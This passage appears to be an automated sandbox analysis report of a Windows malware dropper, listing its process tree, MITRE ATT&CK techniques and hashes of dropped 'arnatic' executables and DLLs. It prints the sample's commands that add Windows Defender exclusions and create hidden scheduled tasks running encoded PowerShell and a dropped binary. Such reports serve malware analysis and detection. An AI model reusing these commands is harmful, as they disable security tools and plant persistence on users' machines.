                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2420
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4700
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4816
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:2092
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:1848
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4116
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "gaJsJYulR" /SC once /ST 11:10:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:3964
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /run /I /tn "gaJsJYulR"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:740
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /DELETE /F /TN "gaJsJYulR"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1596
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "CHeJVxoJwhzmREGSo" /SC once /ST 05:14:02 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\lWzEVId.exe\" sG /site_id 525403 /S" /V1 /F
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:3744
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /run /I /tn "CHeJVxoJwhzmREGSo"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:2216
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\eciwwuw
                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\eciwwuw
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:1280
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\shiwwuw
                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\shiwwuw
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:4596
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:3252
                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 600 -p 1728 -ip 1728
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:1992
                                                                                                                                                                                                                • C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\lWzEVId.exe
                                                                                                                                                                                                                  C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\lWzEVId.exe sG /site_id 525403 /S
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:3600

                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                  Execution

                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                  Modify Existing Service

                                                                                                                                                                                                                  2
                                                                                                                                                                                                                  T1031

                                                                                                                                                                                                                  New Service

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1050

                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1060

                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                                                                  New Service

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1050

                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                                  4
                                                                                                                                                                                                                  T1112

                                                                                                                                                                                                                  Disabling Security Tools

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1089

                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1130

                                                                                                                                                                                                                  Credential Access

                                                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                                                  3
                                                                                                                                                                                                                  T1081

                                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                                  7
                                                                                                                                                                                                                  T1012

                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                                  7
                                                                                                                                                                                                                  T1082

                                                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1120

                                                                                                                                                                                                                  Process Discovery

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1057

                                                                                                                                                                                                                  Collection

                                                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                                                  3
                                                                                                                                                                                                                  T1005

                                                                                                                                                                                                                  Command and Control

                                                                                                                                                                                                                  Web Service

                                                                                                                                                                                                                  1
                                                                                                                                                                                                                  T1102

                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\arnatic_7.exe.log
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    3654bd2c6957761095206ffdf92b0cb9

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    6f10f7b5867877de7629afcff644c265e79b4ad3

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    c2a4be94cf4ed33d698d9838f4ffb47047da796e733ec11562463a1621212ab4

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    e2a81248cca7732ce098088d5237897493fd3629e28d66bc13e5f9191f72cd52893f4a53905906af12d5c6de475738b6c7f6b718a32869e9ee0deb3a54672f79

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_1.exe
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    633231b77c750ebb17e0f980b7a78c64

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    9ddabf2d8eba34838b9f0baf7fbb7dc296a5f761

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    f67157e8ee2b4abf6991607461f7fc0e25f2e4ebd384410a7d060db882a60756

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    22a71b743422e86d96fc51c6eba3ec4f73f69f19e5443560071fabbe3ce482d523aa017bd7361ae243f5026c13d36d32b1d18548af778bf855ccc25efac8590d

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_1.txt
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    633231b77c750ebb17e0f980b7a78c64

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    9ddabf2d8eba34838b9f0baf7fbb7dc296a5f761

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    f67157e8ee2b4abf6991607461f7fc0e25f2e4ebd384410a7d060db882a60756

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    22a71b743422e86d96fc51c6eba3ec4f73f69f19e5443560071fabbe3ce482d523aa017bd7361ae243f5026c13d36d32b1d18548af778bf855ccc25efac8590d

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_2.exe
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    0e501d2db1ce6ec75c1bacf38f26d8e7

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    754bea241841d6e98bbc10437831e86c8c467ea8

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    581fe21b1d428a994d1c0a00104b1eb11f49ffda3a9e697553e8419f2555345e

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    9c10a107a5215af4f30deab7253fb88117c903abde1c049d8604bc3659117aafad376150c2bf4ec63a2d6357e1e4f21e2518c58e5670c86002f3513939331bbe

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_2.txt
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    0e501d2db1ce6ec75c1bacf38f26d8e7

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    754bea241841d6e98bbc10437831e86c8c467ea8

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    581fe21b1d428a994d1c0a00104b1eb11f49ffda3a9e697553e8419f2555345e

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    9c10a107a5215af4f30deab7253fb88117c903abde1c049d8604bc3659117aafad376150c2bf4ec63a2d6357e1e4f21e2518c58e5670c86002f3513939331bbe

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_3.exe
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    6e487aa1b2d2b9ef05073c11572925f2

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    b2b58a554b75029cd8bdf5ffd012611b1bfe430b

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_3.txt
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    6e487aa1b2d2b9ef05073c11572925f2

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    b2b58a554b75029cd8bdf5ffd012611b1bfe430b

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_4.exe
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_4.txt
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_5.exe
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    a2a580db98baafe88982912d06befa64

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    dce4f7af68efca42ac7732870b05f5055846f0f3

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    18310737141e60462bb77bc7e1cd3024fa3308c96f0e2dd37a71b995c72f3a09

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    c4a4887659212674112c4eb40baf2bf227a4b04a9b2c140ea142cc2a47a1cd73c4a0fe6c7cf285f521dd912ef635ae2925ac11bfa9eddbf014493d71e029756b

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_5.txt
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    a2a580db98baafe88982912d06befa64

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    dce4f7af68efca42ac7732870b05f5055846f0f3

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    18310737141e60462bb77bc7e1cd3024fa3308c96f0e2dd37a71b995c72f3a09

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    c4a4887659212674112c4eb40baf2bf227a4b04a9b2c140ea142cc2a47a1cd73c4a0fe6c7cf285f521dd912ef635ae2925ac11bfa9eddbf014493d71e029756b

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_6.exe
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    9065c4e9a648b1be7c03db9b25bfcf2a

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    6ee58f69e199bbc1c7653a4e8621dd583ec6ac61

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    8bd28ed722c7ce293f0a9ce3644e595965e448354ec231cfca25f887605c6f47

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    ad09b354bb85f7534102da2e35ebd4dd5b5c35809e8726968f96170726abd997927e5aa8bc1390571152552361fa139fe04c7a9830b94e627541cc1fd51a329d

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_6.txt
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    9065c4e9a648b1be7c03db9b25bfcf2a

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    6ee58f69e199bbc1c7653a4e8621dd583ec6ac61

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    8bd28ed722c7ce293f0a9ce3644e595965e448354ec231cfca25f887605c6f47

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    ad09b354bb85f7534102da2e35ebd4dd5b5c35809e8726968f96170726abd997927e5aa8bc1390571152552361fa139fe04c7a9830b94e627541cc1fd51a329d

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_7.exe
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    4668a7d4b9f6b8f672fc9292dd4744c1

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    0de41192524e78fd816256fd166845b7ca0b0a92

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    f855237cba5b06f971f92764edb011d5949efed129d14056130069b1e12bd3db

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    f8219e0d5753d9348e22949d90080a43e273733244ef9fab4925cc9f62299bf0c1b25ed9f96d6c17167c3474c4d7e977f8658ac1bf46de1e9691c2f43dccf5ff

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_7.exe
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    4668a7d4b9f6b8f672fc9292dd4744c1

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    0de41192524e78fd816256fd166845b7ca0b0a92

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    f855237cba5b06f971f92764edb011d5949efed129d14056130069b1e12bd3db

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    f8219e0d5753d9348e22949d90080a43e273733244ef9fab4925cc9f62299bf0c1b25ed9f96d6c17167c3474c4d7e977f8658ac1bf46de1e9691c2f43dccf5ff

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_7.txt
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    4668a7d4b9f6b8f672fc9292dd4744c1

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    0de41192524e78fd816256fd166845b7ca0b0a92

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    f855237cba5b06f971f92764edb011d5949efed129d14056130069b1e12bd3db

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    f8219e0d5753d9348e22949d90080a43e273733244ef9fab4925cc9f62299bf0c1b25ed9f96d6c17167c3474c4d7e977f8658ac1bf46de1e9691c2f43dccf5ff

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_8.exe
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    20dc21240b19d3c8a2bdbc05c0c26a9a

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    b77d58f2e927db04d006d980cfc76d8f6824b96e

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    5995313e9720b2a180c8d6c10677970c817a46d2635310b0316dbfd7bd5db0f1

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    23694acbf26538a72da6934a3ba70278044d0d900aa8632434975c9cc2a528ecf37bce648a20d0d638e6bd274c1e7401b9f5a37ef263523040584e749f03f8ea

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_8.txt
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    20dc21240b19d3c8a2bdbc05c0c26a9a

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    b77d58f2e927db04d006d980cfc76d8f6824b96e

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    5995313e9720b2a180c8d6c10677970c817a46d2635310b0316dbfd7bd5db0f1

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    23694acbf26538a72da6934a3ba70278044d0d900aa8632434975c9cc2a528ecf37bce648a20d0d638e6bd274c1e7401b9f5a37ef263523040584e749f03f8ea

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\libcurl.dll
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\libcurl.dll
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\libcurlpp.dll
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\libcurlpp.dll
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\libstdc++-6.dll
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\libstdc++-6.dll
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\libwinpthread-1.dll
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\libwinpthread-1.dll
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\setup_install.exe
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    0d934f9159ec34dffd925ef6591335fa

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    b2b6b789ee014f14c6565a1c2c5fb4b4f3d536ae

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    607dfc71a048943ad3fac02bc73ca334635370e966d80e99cc56451e67d42fae

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    cf724b64a12cb140cafa85ef28a5d5141962b91bde204feb262e2accf84e43d08ba4be0e79b60425df0fe25b63000b26c0974b2790b362f0abc0ac08953e619e

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\setup_install.exe
                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    0d934f9159ec34dffd925ef6591335fa

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    b2b6b789ee014f14c6565a1c2c5fb4b4f3d536ae

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    607dfc71a048943ad3fac02bc73ca334635370e966d80e99cc56451e67d42fae

                                                                                                                                                                                                                    SHA512

